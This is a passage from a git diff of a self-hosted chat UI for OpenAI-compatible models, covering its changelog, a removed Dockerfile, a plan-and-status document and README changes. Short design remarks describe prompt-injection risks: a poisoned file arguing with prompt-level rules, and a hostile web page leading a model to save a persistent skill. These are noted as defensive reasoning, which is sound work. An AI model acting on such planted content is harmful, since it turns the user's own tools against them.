||||
updates page were all missing, and two things listed as *planned* had shipped.
|
||||
It gained sections on Docker, the Proxmox container and updating.
|
||||
|
||||
## 0.9.9
|
||||
|
||||
**The first of five audit passes before 1.0.0** — everything that landed between
|
||||
0.8.1 and 0.9.8 read as a whole rather than one feature at a time. This one is
|
||||
the main logic, the harness, and every instruction a model is given.
|
||||
|
||||
- Fixed: **every model was told the time in a zone with no name.** On any
|
||||
account that had not chosen a timezone — which is the default state of every
|
||||
account — the date line shipped as "Times the person gives you are in
|
||||
unless they say otherwise", on every request. The code claimed in two places
|
||||
that the line disappeared instead. It never had.
|
||||
- Fixed: **the prompt preview could not show most of what it previews.** Eleven
|
||||
fragments are gated on things that only exist once there is a real chat, and
|
||||
the preview has none — so the whole agent surface, both scheduling fragments
|
||||
and the helper warning were missing from it whatever you ticked. Editing
|
||||
`tool.agent` and pressing preview showed a system message without `tool.agent`
|
||||
in it, and nothing said so. Two new controls come with the fix: what kind of
|
||||
chat to preview as, and which agent mode.
|
||||
- Fixed: **a model in Plan mode was told to use a tool it did not have.**
|
||||
`plan_update` is withdrawn in that mode in favour of `plan_submit`, but its
|
||||
guidance appeared whenever a plan existed — directly under the line saying
|
||||
anything not in your tool list does not exist.
|
||||
- Fixed: **reading one knowledge document could fill the whole context window.**
|
||||
Every other reader caps what it returns and says so; this one returned the
|
||||
document whole, and its description said "in full", so it did exactly what it
|
||||
claimed. A long PDF is now cut at 40,000 characters with the model told.
|
||||
- Fixed: **the guidance about helpers on a machine was wrong in both
|
||||
directions.** It denied that a helper can write files, which is a documented
|
||||
option of the tool beside it, and it named seven of the twenty-three commands
|
||||
a helper may run — so a model avoided commands it was allowed to use. Both are
|
||||
now checked against the real list and the real schema by tests, because prose
|
||||
and a constant drift the moment one is edited alone.
|
||||
- The tool description for delegating no longer claims a helper gets "the same
|
||||
tools". It gets deliberately fewer, and sizing a task against the wrong set is
|
||||
how a whole phase gets planned around something that will refuse it.
|
||||
|
||||
- The Updates page notices when the update helper on a host was installed for a
|
||||
**different channel** than the page follows. It is declared in two places —
|
||||
`lembas.env` and the systemd unit — and only the installer writes both, so
|
||||
editing one by hand would have left the button deploying something other than
|
||||
what the page named, with nothing anywhere saying so.
|
||||
- Fixed: release notes from a **signed** tag rendered the signature block.
|
||||
`_notes_for` stripped the PGP header only, and which header appears depends on
|
||||
`gpg.format` — this repository signs with SSH.
|
||||
- A `CHANGELOG.md`, kept from now on rather than assembled at release time.
|
||||
|
||||
## 0.9.8
|
||||
|
||||
**Updates follow a channel, not a commit.** `stable` tracks the newest `vX.Y.Z`
|
||||
tag; `edge` tracks the branch tip. A branch tip is not a release — following one
|
||||
means deploying whatever was pushed five minutes ago — so stable is the default
|
||||
for anybody who is not the person writing it.
|
||||
|
||||
- The Updates page shows a **version** rather than a commit sha: `1.0.0` at a
|
||||
tag, `1.0.0-7-gd4f56d` seven commits past one, and a bare sha only before the
|
||||
first release exists.
|
||||
- Release notes come out of the **annotated tag itself**, so no forge API is
|
||||
involved anywhere. That matters: the Gitea API this was checked against
|
||||
returns a 500 from a server-side panic on exactly the releases endpoint.
|
||||
- A tag with a suffix (`v1.1.0-rc1`) is deliberately not a release — git's
|
||||
version sort ranks it *above* `v1.1.0`, so accepting one would step a stable
|
||||
host onto a candidate.
|
||||
- Fixed: `deploy/update.sh` stopped silently after `== fetching ==` on any host
|
||||
with no release tags — which was every host. Fetched, not reset, not
|
||||
restarted, and no error printed.
|
||||
- Fixed: `install.sh` now refuses an `ssh://` repository URL up front instead of
|
||||
letting the clone fail as a service user with no key.
|
||||
|
||||
## 0.9.7
|
||||
|
||||
**Packaging, and updating without a shell.**
|
||||
|
||||
- `/admin/updates`: what is running, what is available, and what changed between.
|
||||
A button applies it — answered by an **opt-in** systemd helper, because the
|
||||
service runs unprivileged and a web application that can restart its own
|
||||
service is one whose worst day is much worse. Without the helper the page says
|
||||
so and prints the command.
|
||||
- `Dockerfile` and `docker-compose.yml`. No secret key, no data and no `.git`
|
||||
baked in; loopback only; a TLS proxy expected in front, because a service
|
||||
worker and a microphone both require HTTPS or localhost.
|
||||
- `deploy/lxc-install.sh` creates an unprivileged Proxmox container and runs the
|
||||
existing installer inside it.
|
||||
- `/healthz`, which opens the database rather than only proving the socket is
|
||||
listening.
|
||||
|
||||
## 0.9.6
|
||||
|
||||
**Permissions, quotas and sharing.**
|
||||
|
||||
- **"What can this account actually do?"** answered on screen, naming *where*
|
||||
each permission came from — admin, the baseline, or a group.
|
||||
- Users and groups are list-plus-detail, and membership is edited from **one**
|
||||
side. It was on both, and a save from either overwrote what the other showed.
|
||||
- Reading and writing split for notes, memory and skills.
|
||||
- **Quotas on a group** — monthly tokens, concurrent replies, agent wall clock,
|
||||
images a day, helpers a reply. Resolved by maximum across a person's groups,
|
||||
with zero meaning *no limit* and winning outright.
|
||||
- Fixed: **deleting a group or an account left every share naming it behind.**
|
||||
`forget_principal` had existed since shares did and was called by nobody.
|
||||
- Fixed: `library.share` defaulted to off, so sharing shipped documented as done
|
||||
and unreachable — the panel only renders for somebody who holds it.
|
||||
- The share panel is its own action with a search box. It used to be checkboxes
|
||||
inside the resource's save form, listing every account on the instance, and a
|
||||
tick only took effect if you also saved the resource.
|
||||
- Reports are shareable, and every listing has a **Shared with me** filter.
|
||||
|
||||
## 0.9.5
|
||||
|
||||
**Extraction settings, embeddings, and hybrid search.**
|
||||
|
||||
- `/admin/extraction`: upload size, image edge, JPEG quality, PDF pages,
|
||||
extracted characters, orphan age, extra text extensions.
|
||||
- An **embedding model** can be chosen from models flagged for it. Library search
|
||||
then fuses keyword and semantic ranking, so *"how do I get paid"* finds a
|
||||
document that says *"invoicing"*.
|
||||
- **Choosing none is not a degraded mode**: no rows written, no requests made,
|
||||
and byte-for-byte the keyword search that was always there.
|
||||
- Vectors carry their model and width, and a mismatch is skipped rather than
|
||||
scored — comparing two embedding spaces produces a confident wrong answer.
|
||||
- Indexing happens in the background as records are written, with a rebuild
|
||||
button for everything that already existed.
|
||||
|
||||
## 0.9.4
|
||||
|
||||
**An instance can be somebody else's.**
|
||||
|
||||
- Name, tagline, logo, favicon and launcher icons derived from the logo.
|
||||
- The Middle-earth wording is editable data. Leaving a box alone does not freeze
|
||||
it, so a later release can still improve the default.
|
||||
- **Custom themes** as a set of colours rather than a stylesheet, inheriting
|
||||
whichever built-in they start from.
|
||||
- Global CSS overrides, served as `/branding.css`.
|
||||
|
||||
## 0.9.3
|
||||
|
||||
**Subagents.** A reply can hand a self-contained piece of work to a helper that
|
||||
runs on its own and reports back — several at once, so research fans out instead
|
||||
of queueing.
|
||||
|
||||
- A helper cannot ask questions, cannot send helpers of its own, writes nothing
|
||||
unless the call asked and the chat's mode allowed it, and on a machine runs
|
||||
only a fixed list of read-only commands — in **every** mode, including Auto.
|
||||
- Fixed, and it was live in scheduled runs too: an unattended chat that hit an
|
||||
approval built a card nobody could see and sat on it for fifteen minutes.
|
||||
|
||||
## 0.9.2
|
||||
|
||||
**Image generation defaults an administrator can actually set** — steps, cfg,
|
||||
size, sampler, scheduler, denoise, negative prompt, checkpoint, batch. There were
|
||||
none: one hard-coded set from the SD1.5 era, and prose in a box as the only way
|
||||
to change it.
|
||||
|
||||
- The samplers and schedulers ComfyUI had been reporting all along are now the
|
||||
pickers; nothing had ever read them.
|
||||
- The tool's own schema restates the instance's defaults, instead of telling the
|
||||
model "Default 512" beside an instance that draws at 1024.
|
||||
|
||||
## 0.9.1
|
||||
|
||||
**Everything that arrives is announced, not only chat replies.** A scheduled run
|
||||
that filed a report used to light a dot in a corner and say nothing.
|
||||
|
||||
- A count in the tab title while you are looking elsewhere.
|
||||
- **Web push**, so a schedule firing at seven in the morning reaches a browser
|
||||
that is shut. Opt-in per device. It is the one thing here that contacts an
|
||||
outside service, and `services/push.py` says so plainly.
|
||||
|
||||
## 0.9.0
|
||||
|
||||
**A model can schedule things.** There was no tool for it — asked to "remind me
|
||||
every Monday", a model wrote a note and reported that it had scheduled
|
||||
something, and every screen agreed with it.
|
||||
|
||||
- `schedule_create`, `schedule_list`, `schedule_update`, `schedule_cancel`, over
|
||||
the same rule normaliser the manual form uses.
|
||||
- The reply says the resulting timing back in words, which is the only moment
|
||||
anybody can check that Monday was understood as Monday.
|
||||
|
||||
## 0.8.3
|
||||
|
||||
**An SSH connection may not point at this machine unless an administrator says
|
||||
so.** A profile aimed at `127.0.0.1` walked straight past "nothing runs on the
|
||||
LLeMbas host" — through a real login, onto the machine holding the database and
|
||||
the encryption key. Three positions: off, one named port, or anywhere.
|
||||
|
||||
## 0.8.2
|
||||
|
||||
- Fixed: **opening the canvas before a chat existed swapped the whole site into
|
||||
the panel.** `hx-get=""` is not "fetch nothing" — htmx looks for the attribute,
|
||||
not the value, so the empty one was a real request for the current document.
|
||||
- Fixed: the Canvas and Terminal buttons appeared where they could not work.
|
||||
- The bottom edge of the shell is no longer drawn, so the sidebar footer and the
|
||||
composer stop meeting a line at two different heights.
|
||||
- Admin pages scroll in one container; `/admin/prompts` no longer drops you at
|
||||
the bottom of a shorter panel.
|
||||
-69
@@ -1,69 +0,0 @@
|
||||
# LLeMbas in a container.
|
||||
#
|
||||
# One stage, on purpose. There is nothing to build: no Node, no compiled assets,
|
||||
# no wheel worth producing separately — the vendored browser libraries are
|
||||
# committed and the templates are read at runtime. A multi-stage build here
|
||||
# would be ceremony that saves nothing and hides where the files came from.
|
||||
#
|
||||
# **This image is not a deployment on its own.** It serves plain HTTP and expects
|
||||
# a TLS reverse proxy in front, and that is a constraint rather than a
|
||||
# preference: a service worker and a microphone both require HTTPS or localhost,
|
||||
# so over plain http on a LAN address the app installs as nothing and cannot
|
||||
# dictate. See deploy/README.md.
|
||||
|
||||
FROM python:3.12-slim
|
||||
|
||||
# `bash` and `git` earn their place: `git` is what /admin/updates reads to say
|
||||
# what is running, and its absence there is reported rather than crashed on.
|
||||
# `curl` is the healthcheck below. Everything else stays out.
|
||||
RUN apt-get update \
|
||||
&& apt-get install --no-install-recommends -y git curl \
|
||||
&& rm -rf /var/lib/apt/lists/*
|
||||
|
||||
# A real account rather than root, and made before the install so the layers it
|
||||
# owns are its own. 10001 rather than the first free id: a bind-mounted volume
|
||||
# on the host is easier to reason about when the id is stated.
|
||||
RUN useradd --create-home --uid 10001 --shell /usr/sbin/nologin lembas
|
||||
|
||||
WORKDIR /app
|
||||
|
||||
# The dependency install is its own layer, keyed on the files that decide it, so
|
||||
# editing a template does not re-resolve the whole tree.
|
||||
#
|
||||
# LICENSE is in the list because `pyproject.toml` declares `license = { file =
|
||||
# "LICENSE" }` and the build backend reads it -- without it the install fails
|
||||
# with "License file does not exist", which reads like a packaging problem and
|
||||
# is a missing COPY. README.md is there for the same reason (`readme = `).
|
||||
COPY pyproject.toml README.md LICENSE ./
|
||||
COPY src/lembas/__init__.py src/lembas/__init__.py
|
||||
RUN pip install --no-cache-dir -e ".[search,ssh]"
|
||||
|
||||
COPY . .
|
||||
# Again, because the first install ran against a source tree with one file in
|
||||
# it. Cheap: everything is already resolved and cached above.
|
||||
RUN pip install --no-cache-dir --no-deps -e "." \
|
||||
&& chown -R lembas:lembas /app
|
||||
|
||||
# The database, the uploads and the encryption at rest all live here. Declared
|
||||
# so that running without `-v` still works and says where the data went, rather
|
||||
# than losing it silently at the first `docker rm`.
|
||||
ENV LEMBAS_DATA_DIR=/data \
|
||||
LEMBAS_HOST=0.0.0.0 \
|
||||
LEMBAS_PORT=8080 \
|
||||
PYTHONUNBUFFERED=1
|
||||
RUN install -d -o lembas -g lembas /data
|
||||
VOLUME ["/data"]
|
||||
|
||||
# **No secret key is baked in.** One in an image is one every copy of the image
|
||||
# shares, and rotating it signs everybody out *and* makes stored upstream API
|
||||
# keys unreadable. Without LEMBAS_SECRET_KEY the app generates a temporary one
|
||||
# and warns loudly at startup, which is the right failure: it works for a look
|
||||
# and cannot be mistaken for a deployment.
|
||||
|
||||
USER lembas
|
||||
EXPOSE 8080
|
||||
|
||||
HEALTHCHECK --interval=30s --timeout=5s --start-period=20s --retries=3 \
|
||||
CMD curl -fsS http://127.0.0.1:8080/healthz || exit 1
|
||||
|
||||
CMD ["lembas", "serve"]
|
||||
@@ -0,0 +1,337 @@
|
||||
# LLeMbas — plan and status
|
||||
|
||||
Where the project is, what is deliberately not built yet, and the decisions
|
||||
that would be expensive to revisit. Kept current as work lands; the detail of
|
||||
*how* things work lives in [`CLAUDE.md`](CLAUDE.md).
|
||||
|
||||
**Status:** usable daily. Streaming chat, attachments, reasoning, tool calling
|
||||
with web search, custom HTTP tools and MCP servers, agent chats that work on a
|
||||
machine over SSH, a knowledge library, notes, memory and skills, speech in and
|
||||
out, users and groups, model administration, installable as an app. 1009 tests,
|
||||
`ruff` clean.
|
||||
|
||||
---
|
||||
|
||||
## The shape of it
|
||||
|
||||
A self-hosted web UI for OpenAI-compatible endpoints, written in Python, themed
|
||||
after Middle-earth.
|
||||
|
||||
| | |
|
||||
|---|---|
|
||||
| Stack | FastAPI + Jinja + htmx + a little Alpine |
|
||||
| Build step | none — no Node, no npm, no CDN at runtime |
|
||||
| Database | SQLite, schema synchronised additively at startup |
|
||||
| Deployment | systemd unit + nginx vhost, one worker |
|
||||
|
||||
These are load-bearing. Dropping the no-build rule or moving off SQLite would
|
||||
be a different project, not a refactor.
|
||||
|
||||
---
|
||||
|
||||
## Done
|
||||
|
||||
### Chat
|
||||
- [x] Streaming replies over server-sent events
|
||||
- [x] **Markdown renders progressively** — re-rendered whole every 100ms rather
|
||||
than appending tokens, because a list or code fence is only correct once
|
||||
its context exists
|
||||
- [x] Syntax highlighting (Pygments), sanitised with nh3
|
||||
- [x] **Generation runs in the background** — a task, not the request. Navigate
|
||||
away, open another chat, close the tab: the reply keeps being written and
|
||||
reattaching replays the whole state
|
||||
- [x] **Stop** — the send button becomes Stop while writing; what arrived is kept
|
||||
- [x] **Rewind** — edit one of your own turns and the conversation runs on from
|
||||
there. Truncates rather than branching
|
||||
- [x] Copy, regenerate, automatic chat titles
|
||||
- [x] Chats created on first message, so an abandoned composer leaves nothing
|
||||
- [x] **Unread indicator** — a green dot and a toast when a reply lands while
|
||||
you were elsewhere
|
||||
- [x] Folders, arbitrarily nested; deleting one keeps the chats inside it
|
||||
- [x] Per-reply metrics — tokens, context used as a percentage, tokens/second,
|
||||
live while streaming and kept afterwards. Estimated with a `~` when the
|
||||
endpoint reports no usage
|
||||
- [x] Compaction — a button, and automatically at a configurable percentage of
|
||||
the model's context. Summarised turns are kept and collapsed, not deleted
|
||||
- [x] Temporary chats — never listed, swept after a day, with a Keep button
|
||||
- [x] An admin-only request inspector beside the thread
|
||||
|
||||
### Tools
|
||||
- [x] **Tool calling** — one reply is a bounded loop of requests, not one
|
||||
request. Text produced before a call is kept
|
||||
- [x] **Web search** as the first tool: DuckDuckGo (no setup), SearXNG or
|
||||
Firecrawl, chosen in the admin area
|
||||
- [x] Only offered to models flagged `tools`, because an endpoint without
|
||||
support rejects the whole request rather than ignoring the array
|
||||
- [x] Sources stay in the transcript; results are **not** replayed as context on
|
||||
the next turn, for the same reasons reasoning is not
|
||||
- [x] A round's calls run together, and the reply says which tool is running —
|
||||
a remote tool taking seconds with nothing streaming looks like a hang
|
||||
- [x] **A reply can stop and ask you something** — one or more questions on one
|
||||
card, with answers to pick from and a box to write your own, answered
|
||||
together. The same mechanism carries command approvals
|
||||
- [x] **Custom HTTP tools** — an administrator describes one call: a JSON Schema,
|
||||
a URL template, headers, an encrypted secret and how to read the answer.
|
||||
Arguments may fill a hole but never move the target: the scheme and host
|
||||
are literal, values are escaped for where they land, and the origin is
|
||||
pinned afterwards
|
||||
- [x] **MCP servers** over streamable HTTP — a hand-written client, so that
|
||||
`check_url` runs on every hop rather than being bypassed by somebody
|
||||
else's transport. Tools are discovered and cached by a button, namespaced
|
||||
per server, and a server's own descriptions are bounded before they reach
|
||||
a model as instructions
|
||||
- [x] Both gated like the built-ins — a model capability, a permission — and
|
||||
restrictable to groups, with guidance of their own on `/admin/prompts`
|
||||
- [x] Local MCP over stdio is deliberately absent: spawning a subprocess would
|
||||
run on this machine, which nothing here does
|
||||
|
||||
### Agent chats
|
||||
- [x] A chat is a **Chat** or an **Agent**, chosen when it starts and fixed
|
||||
thereafter — a transcript whose earlier turns ran somewhere else is not
|
||||
one conversation. Knowledge, memories and skills are shared across both
|
||||
- [x] **Nothing runs on the LLeMbas host.** Commands go to a machine reached
|
||||
over SSH, so containment is somebody's considered choice of host — a
|
||||
container built for the job — rather than a sandbox built here. A local
|
||||
one was designed in detail and dropped; see CLAUDE.md for why
|
||||
- [x] **SSH connections are user-owned**, like notes. An administrator decides
|
||||
only whether the feature exists at all
|
||||
- [x] Trust on first use, made explicit: adding a host does not connect to it,
|
||||
**Check** shows its fingerprint with nothing sent, and only accepting
|
||||
pins it. A host that later answers with a different key is refused
|
||||
- [x] Four modes as a table over what each tool does to the world —
|
||||
**Manual** asks about everything, **Edit** writes freely but asks before
|
||||
commands, **Auto** asks about nothing, **Plan** reads freely and changes
|
||||
nothing. Switchable at any time; read once per reply
|
||||
- [x] Enforced in the generation loop, not in the prompt: a rule a model is
|
||||
merely told is one a poisoned file can argue with
|
||||
- [x] A deny list beats **Auto**; an allow list cannot be matched by a command
|
||||
containing anything that joins two commands together
|
||||
- [x] `shell_run`, `file_read`, `file_write`, `file_list` — files over SFTP,
|
||||
never through a shell, because the SSH exec protocol has no argv form
|
||||
- [x] **Plan mode ends with a plan** you can carry out with one button, which
|
||||
switches to Edit and sends it back quoted rather than as an instruction
|
||||
- [x] Per-reply budgets on steps, wall clock and output, with time spent
|
||||
waiting for you subtracted
|
||||
- [x] **A terminal panel** beside the chat, holding a real shell on that chat's
|
||||
own connection. The modes govern the model; what a person types is theirs,
|
||||
since they hold the credential and could open the same shell with an ssh
|
||||
client. The model cannot see the panel — sending it output is a button
|
||||
- [x] The shell outlives the panel and the page: closing it leaves a build
|
||||
running, and coming back reattaches with the scrollback. An idle timeout
|
||||
is what eventually ends one, and so does deleting the chat, or disabling,
|
||||
moving or deleting the connection
|
||||
- [x] **The panel is resizable**, dragged from its edge or nudged with the
|
||||
arrow keys, and the width follows you to another browser
|
||||
- [x] **It knows where one command ends and the next begins** — bash and zsh
|
||||
are given the markers VS Code and WezTerm use, so *Copy* and *Send* mean
|
||||
one command and its output rather than the last forty rows of the screen.
|
||||
An **Auto** toggle collects each one into the next message. Any other
|
||||
shell starts exactly as it did before, the buttons fall back to the
|
||||
screen and say so, and Auto is disabled rather than degraded
|
||||
- [x] **The project directory is listed for the model** — one read-only
|
||||
command, `git ls-files` where that works so `.gitignore` is honoured for
|
||||
free, budgeted so a big directory becomes a count rather than a thousand
|
||||
filenames on every request
|
||||
- [x] **A directory is chosen by browsing it** over SFTP, not by typing a path
|
||||
into an unlabelled box
|
||||
- [x] The approval mode is chosen **before** the first message, beside the
|
||||
message box rather than in the header
|
||||
|
||||
### The library
|
||||
- [x] **Knowledge bases** — documents, images and saved web pages, grouped into
|
||||
named collections and ingested through the same pipeline as chat
|
||||
attachments, searched with SQLite FTS5
|
||||
- [x] A chat can be pointed at particular bases, so "answer from the contracts
|
||||
folder" is a different question from "answer from everything I have"
|
||||
- [x] **Notes** — longer things the model writes down and searches later;
|
||||
editable by hand, because they are yours
|
||||
- [x] **Memory** — short facts, injected on every turn to a budget rather than
|
||||
searched, and managed in your settings
|
||||
- [x] **Skills** — saved procedures. Only the name and description are injected;
|
||||
the body is fetched when the model decides it applies
|
||||
- [x] A model may write and revise its own notes, memories and skills. Every
|
||||
skill revision is kept, attributed and revertible — the safety story is a
|
||||
record and a way back, not a gate
|
||||
- [x] **Sharing** — a knowledge base, a note or a skill can be shared with a
|
||||
group or with named people, read-only. One visibility rule, and
|
||||
administrators do not bypass it. Documents are shared through their base
|
||||
- [x] **The harness** — an operational prompt assembled from what a model
|
||||
actually has, so the tools get used rather than ignored
|
||||
- [x] Attach menu: file, image, a web page fetched on the spot, or a document
|
||||
from the library
|
||||
- [x] **`@` to name one** — the library everywhere, and files in the project
|
||||
directory in an agent chat. The reference stays in the sentence and the
|
||||
contents come along, with the path and the machine, so the model knows
|
||||
exactly which file it was handed
|
||||
|
||||
### Audio
|
||||
- [x] **Dictation** — record in the composer, transcribed by any OpenAI-shaped
|
||||
`/v1/audio/transcriptions` endpoint. The recording never touches disk
|
||||
- [x] **Read aloud** — any `/v1/audio/speech` endpoint, with the voice list
|
||||
discovered from the server where it offers one
|
||||
- [x] Instance defaults in Admin, per-reader overrides in Settings — voice,
|
||||
speed, dictation language, and whether replies play automatically
|
||||
|
||||
### Models and reasoning
|
||||
- [x] OpenAI-compatible connections with encrypted keys and model discovery
|
||||
- [x] **Reasoning display** — `reasoning_content` and inline `<think>` tags,
|
||||
collapsed by default, labelled with how long it took, never replayed as
|
||||
context
|
||||
- [x] Model admin as a list plus a page per model; scales to hundreds
|
||||
- [x] Ordering, pinning (a sidebar shortcut, *not* a reordering), instance
|
||||
default, per-user default, images, capability flags
|
||||
- [x] Custom model picker showing avatars, descriptions and capabilities
|
||||
|
||||
### Attachments
|
||||
- [x] Drag, paste or pick images, PDFs and text files
|
||||
- [x] Images downscaled and sent to vision models as content parts
|
||||
- [x] PDF and text extracted at upload and placed in the prompt
|
||||
- [x] Type decided by inspecting bytes, random names on disk, non-images served
|
||||
as downloads with `nosniff`
|
||||
- [x] No OCR: a scanned PDF says so rather than silently contributing nothing
|
||||
|
||||
### People
|
||||
- [x] Accounts, argon2, revocable server-side sessions, self-service password
|
||||
change
|
||||
- [x] Users and groups with permissions that **union** rather than override
|
||||
- [x] Model access restricted to chosen groups
|
||||
- [x] Registration toggle, instance settings stored in the database
|
||||
|
||||
### Prompts
|
||||
- [x] Three layers — instance, model, chat — with the most specific winning
|
||||
**outright** rather than being concatenated
|
||||
- [x] Every injected fragment editable at `/admin/prompts`: the tool guidance,
|
||||
the memory and skill sections, the seam above the authored prompt, and the
|
||||
request that names a chat
|
||||
- [x] `{{variables}}` with a legend, values shown as they currently resolve, and
|
||||
pass-through for anything that is not one
|
||||
- [x] A preview of the whole assembled system message, including unsaved edits
|
||||
- [x] Defaults in code and overrides in the database, so improving a default
|
||||
still reaches an instance that never edited it
|
||||
|
||||
### Suggestions
|
||||
- [x] Admin-managed cards on the new-chat screen; three seeded once at startup
|
||||
|
||||
### Interface
|
||||
- [x] **`/` for commands** — compact, usage, mode, model, title, the panels,
|
||||
the theme. Anything not in the table is sent as an ordinary message, and
|
||||
`//` starts one with a literal slash
|
||||
- [x] **Keyboard shortcuts** for the same jobs, listed beside the commands in
|
||||
one table so `/help` cannot go stale
|
||||
- [x] Mentions and recognised commands are marked as you type, and again in the
|
||||
transcript, so you can see what a message will do before sending it
|
||||
- [x] **Reasoning effort** per chat, with a per-model default. Sent as both
|
||||
`reasoning_effort` and `chat_template_kwargs`, and only once chosen:
|
||||
OpenAI and vLLM read the first, llama.cpp silently drops it and reads
|
||||
only the second
|
||||
- [x] **Installable** — manifest, generated PWA icons, a service worker for the
|
||||
shell and a themed offline page. The worker deliberately never touches
|
||||
`/api/`: a reply is an event stream and caching one breaks it
|
||||
- [x] Two themes (`moria`, `shire`) from one set of design tokens
|
||||
- [x] Every control sized from `--control-h`, so rows line up by construction
|
||||
- [x] Toasts and dialogs of our own; no `window.confirm` anywhere
|
||||
- [x] Original SVG artwork generated from a single source
|
||||
|
||||
### Operations
|
||||
- [x] Additive schema sync — new tables and columns applied at startup
|
||||
- [x] `deploy/` — systemd unit and nginx templates, install and update scripts
|
||||
|
||||
---
|
||||
|
||||
## Not built yet
|
||||
|
||||
In the order they are likely to be worth doing.
|
||||
|
||||
### Image generation
|
||||
Left until last from the start, as it needs heavy customisation. ComfyUI is
|
||||
already running on this machine and is the obvious first target.
|
||||
|
||||
### Smaller things
|
||||
- **OCR** for scanned PDFs
|
||||
- **Conversation branching** — `Message.parent_id` exists unused; needs a UI for
|
||||
choosing between versions, which is why rewind truncates for now
|
||||
- **Chat export** (Markdown, JSON)
|
||||
- **Semantic search** in the library — the retrieval service is one call, so an
|
||||
embedding backend can go behind it without touching the tools or the UI
|
||||
- **Archived chats** — the column exists, nothing surfaces it
|
||||
- **Per-user quotas**
|
||||
|
||||
---
|
||||
|
||||
## Known limits
|
||||
|
||||
Worth knowing before they surprise someone.
|
||||
|
||||
**One worker.** The generation registry and the stop mechanism are in-process.
|
||||
Running several workers needs that state in the database or a broker, because
|
||||
the request following a reply would not necessarily land in the process writing
|
||||
it.
|
||||
|
||||
**A restart abandons replies in flight.** Shutdown cancels them and keeps what
|
||||
each had. There is no resume.
|
||||
|
||||
**Schema changes are additive only.** New tables and columns apply themselves;
|
||||
renames, drops and retypes are manual against the SQLite file. `MANUAL_STEPS`
|
||||
in `db/migrations.py` is where such a step gets recorded.
|
||||
|
||||
**Attachments live on disk, unreferenced files are swept at startup.** No
|
||||
deduplication, no size quota.
|
||||
|
||||
**Unread is polled every 10 seconds.** A push channel would be more responsive
|
||||
but means an always-on connection per tab for the sake of a green dot.
|
||||
|
||||
**Installing needs HTTPS or localhost.** Service workers are unavailable over
|
||||
plain HTTP, so a LAN install without TLS is a normal browser tab. The
|
||||
microphone is unavailable for the same reason.
|
||||
|
||||
**Tool calling needs a model that supports it.** The `tools` flag is an
|
||||
administrator's assertion, not something endpoints reliably advertise. Set it on
|
||||
a model that cannot, and its replies fail rather than degrade.
|
||||
|
||||
**Library search is keyword, not semantic.** FTS5 ranks well and needs no
|
||||
dependency or embedding endpoint, but "how do I get paid" will not find a
|
||||
document that says "invoicing".
|
||||
|
||||
**A model can write its own skills, and they take effect at once.** Marked as
|
||||
model-authored and fully revertible, but a model that has just read a hostile
|
||||
page could save a skill that outlives the conversation. The mitigation is that
|
||||
it is visible and undoable, not that it was prevented.
|
||||
|
||||
---
|
||||
|
||||
## Deliberate decisions
|
||||
|
||||
Recorded because each looks like an oversight until you know the reason.
|
||||
|
||||
- **No JavaScript build step.** Browser libraries are hash-pinned and committed.
|
||||
A self-hosted tool should work offline and not report page views to a CDN.
|
||||
- **Permissions union, never deny.** With denies, "why can this user not do X"
|
||||
cannot be answered without simulating every group.
|
||||
- **System prompts replace, never stack.** Two layers that disagree give the
|
||||
model contradictory instructions and nobody can tell which is losing.
|
||||
- **Rewind truncates, does not branch.** Branching needs a UI for choosing
|
||||
between versions; "go back and try again from here" is what was asked for.
|
||||
- **Pinning is a shortcut, not an ordering.** A picker whose order silently
|
||||
differs from the admin screen is confusing.
|
||||
- **Images only reach models marked `vision`.** Not graceful degradation: most
|
||||
endpoints reject the entire request rather than ignoring an image part. Tools
|
||||
are gated the same way, for the same reason.
|
||||
- **Sharing grants reading, never writing.** Two people editing one note with no
|
||||
history and no merge is worse than the inconvenience of copying it.
|
||||
- **Memory is never shareable.** A record about a person is not content to hand
|
||||
round.
|
||||
- **Knowledge attached to a message is copied, not referenced.** History must not
|
||||
change under a conversation because a document was edited later.
|
||||
- **The harness is prepended to the authored prompt, not a fourth layer.** It
|
||||
describes the machinery; the authored layers describe the behaviour. Only one
|
||||
authored layer still wins.
|
||||
- **Tool results are not replayed.** Like reasoning: the answer already contains
|
||||
what the model made of them, and replaying stale results into every later
|
||||
request wastes the window and sends small models into search loops.
|
||||
- **The service worker caches the shell, never a page with a user in it.** A
|
||||
cached conversation would be a snapshot that silently went stale, belonging to
|
||||
whoever was signed in last.
|
||||
- **Markdown rendered server-side.** One code path produces the streamed and
|
||||
the stored view, so they cannot disagree.
|
||||
- **This repository is public.** Deployment hostnames, ports and paths stay out
|
||||
of it; `deploy/` is templates, and the real values live in private notes.
|
||||
@@ -8,7 +8,6 @@
|
||||
</p>
|
||||
|
||||
<p align="center">
|
||||
<img alt="Version 1.0.0" src="https://img.shields.io/badge/version-1.0.0-6B8E4E?style=flat-square">
|
||||
<img alt="Python 3.11+" src="https://img.shields.io/badge/python-3.11%2B-3E6B7A?style=flat-square">
|
||||
<img alt="License GPL-3.0" src="https://img.shields.io/badge/license-GPL--3.0-C9A227?style=flat-square">
|
||||
<img alt="No Node required" src="https://img.shields.io/badge/build%20step-none-6B8E4E?style=flat-square">
|
||||
@@ -100,68 +99,20 @@ runtime. Clone it, `pip install -e .`, run it.
|
||||
- **Model settings** — searchable, filterable list with a page per model:
|
||||
ordering, pinned models, an instance default and a per-user default, custom
|
||||
names, descriptions and images. Scales to hundreds of models
|
||||
- **Things that happen because time passed** — say "every Monday at nine" and a
|
||||
model can set it up itself, against the same recurrence rule the manual form
|
||||
uses. A run can file a **report** you read later, send you a message, or work
|
||||
on in a chat of its own. The reply says the timing back in words, which is the
|
||||
one moment anybody can check that Monday was understood as Monday
|
||||
- **News that finds you** — a dot in the sidebar, a count in the tab title while
|
||||
you are looking elsewhere, and **web push** so a schedule firing at seven in
|
||||
the morning reaches a browser that is shut. Opt-in per device
|
||||
- **Helpers** — a reply can hand a self-contained piece of work to another model
|
||||
that runs on its own and reports back, several at once, so research fans out
|
||||
instead of queueing. A helper cannot ask questions, cannot send helpers of its
|
||||
own, and on a machine runs only a fixed list of read-only commands
|
||||
- **Drawing** — point it at a ComfyUI and a model can make images, against
|
||||
workflow templates and defaults you set: size, steps, sampler, scheduler,
|
||||
checkpoint. It reviews its own result and can try again
|
||||
- **Semantic search** — pick an embedding model and library search fuses keyword
|
||||
and meaning, so *"how do I get paid"* finds a document that says *"invoicing"*.
|
||||
Choosing none is not a degraded mode: it is byte-for-byte the keyword search
|
||||
that was always there, with nothing written and no requests made
|
||||
- **Users, groups & permissions** — per-group grants that union rather than
|
||||
override, model access restricted to chosen groups, read and write split for
|
||||
notes, memory and skills, and a screen that answers *"what can this account
|
||||
actually do?"* by naming where each permission came from
|
||||
